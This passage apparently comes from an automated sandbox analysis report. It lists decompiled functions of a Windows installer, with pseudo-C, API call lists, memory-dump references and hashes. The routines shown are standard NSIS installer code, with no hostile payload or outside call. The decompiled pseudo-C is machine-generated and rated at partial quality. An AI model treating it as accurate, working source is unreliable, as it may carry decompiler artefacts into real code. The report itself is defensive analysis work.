                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401C43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 59%
                                                                            			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                            0x00401c43
                                                                            0x00401c45
                                                                            0x00401c4c
                                                                            0x00401c4f
                                                                            0x00401c52
                                                                            0x00401c5c
                                                                            0x00401c60
                                                                            0x00401c63
                                                                            0x00401c6c
                                                                            0x00401c6c
                                                                            0x00401c6f
                                                                            0x00401c73
                                                                            0x00401c7c
                                                                            0x00401c7c
                                                                            0x00401c7f
                                                                            0x00401c83
                                                                            0x00401c85
                                                                            0x00401cda
                                                                            0x00401cdc
                                                                            0x00401ce7
                                                                            0x00401cf1
                                                                            0x00401cf4
                                                                            0x00401cf4
                                                                            0x00401cfd
                                                                            0x00000000
                                                                            0x00401c87
                                                                            0x00401c8e
                                                                            0x00401c90
                                                                            0x00401c93
                                                                            0x00401c99
                                                                            0x00401ca0
                                                                            0x00401ca3
                                                                            0x00401ccb
                                                                            0x00401d03
                                                                            0x00401d03
                                                                            0x00401ca5
                                                                            0x00401cb3
                                                                            0x00401cbb
                                                                            0x00401cbe
                                                                            0x00401cbe
                                                                            0x00401ca3
                                                                            0x00401d06
                                                                            0x00401d09
                                                                            0x00401d0f
                                                                            0x00402ba4
                                                                            0x00402ba4
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                            • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                            • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                            • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040605C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                            0x00406062
                                                                            0x00406068
                                                                            0x00406069
                                                                            0x00406069
                                                                            0x0040606e
                                                                            0x0040606f
                                                                            0x00406072
                                                                            0x00406077
                                                                            0x0040607a
                                                                            0x00406084
                                                                            0x00406091
                                                                            0x00406095
                                                                            0x0040609d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004060a1
                                                                            0x00000000
                                                                            0x004060a3
                                                                            0x004060a3
                                                                            0x004060a3
                                                                            0x004060a6
                                                                            0x004060a9
                                                                            0x004060a9
                                                                            0x004060ac
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040607A
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-4262883142
                                                                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                            • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                            • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004015C1, Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8));
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(0x441000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                            0x004015c1
                                                                            0x004015c9
                                                                            0x004015cc
                                                                            0x004015d1
                                                                            0x004015d5
                                                                            0x004015d7
                                                                            0x004015df
                                                                            0x004015e1
                                                                            0x004015e4
                                                                            0x004015ea
                                                                            0x00401604
                                                                            0x00401607
                                                                            0x004015ec
                                                                            0x004015ec
                                                                            0x004015ef
                                                                            0x00000000
                                                                            0x004015fa
                                                                            0x004015fd
                                                                            0x004015fd
                                                                            0x004015ef
                                                                            0x0040160e
                                                                            0x00401615
                                                                            0x00401624
                                                                            0x00401624
                                                                            0x00401617
                                                                            0x0040161a
                                                                            0x00401622
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00401622
                                                                            0x00401615
                                                                            0x00401627
                                                                            0x0040162b
                                                                            0x0040162c
                                                                            0x004015d7
                                                                            0x00401634
                                                                            0x00401663
                                                                            0x004022f1
                                                                            0x00401636
                                                                            0x00401638
                                                                            0x00401645
                                                                            0x0040164d
                                                                            0x00401655
                                                                            0x0040165b
                                                                            0x0040165b
                                                                            0x00401655
                                                                            0x00402c2d
                                                                            0x00402c39

                                                                            APIs
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID:
                                                                            • API String ID: 1892508949-0
                                                                            • Opcode ID: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                                                                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                            • Opcode Fuzzy Hash: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                                                                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 69%
                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
					}
				}
				return 0;
			}











                                                                            0x0040138a
                                                                            0x004013fa
                                                                            0x0040139b
                                                                            0x004013a0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004013a2
                                                                            0x004013a3
                                                                            0x004013ad
                                                                            0x00000000
                                                                            0x00401404
                                                                            0x004013b0
                                                                            0x004013b7
                                                                            0x004013bd
                                                                            0x004013be
                                                                            0x004013c0
                                                                            0x004013c2
                                                                            0x004013b9
                                                                            0x004013b9
                                                                            0x004013ba
                                                                            0x004013ba
                                                                            0x004013c9
                                                                            0x004013cb
                                                                            0x004013f4
                                                                            0x004013f4
                                                                            0x004013c9
                                                                            0x00000000

                                                                            APIs
                                                                            • MulDiv.KERNEL32 ref: 004013E4
                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401EDE, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                                                                            • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                            • Opcode Fuzzy Hash: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                                                                            • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405B20, Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                            0x00405b29
                                                                            0x00405b49
                                                                            0x00405b51
                                                                            0x00405b56
                                                                            0x00000000
                                                                            0x00405b5c
                                                                            0x00405b60

                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000), ref: 00405B49
                                                                            • CloseHandle.KERNEL32(?), ref: 00405B56
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                            • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                                            • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                            • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040690A, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                            0x00406912
                                                                            0x00406915
                                                                            0x0040691c
                                                                            0x00406924
                                                                            0x00406930
                                                                            0x00000000
                                                                            0x00406937
                                                                            0x00406927
                                                                            0x0040692e
                                                                            0x00000000
                                                                            0x0040693f
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                            • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                            • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040602D, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 68%
                                                                            			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                            0x00406031
                                                                            0x0040603e
                                                                            0x00406053
                                                                            0x00406059

                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

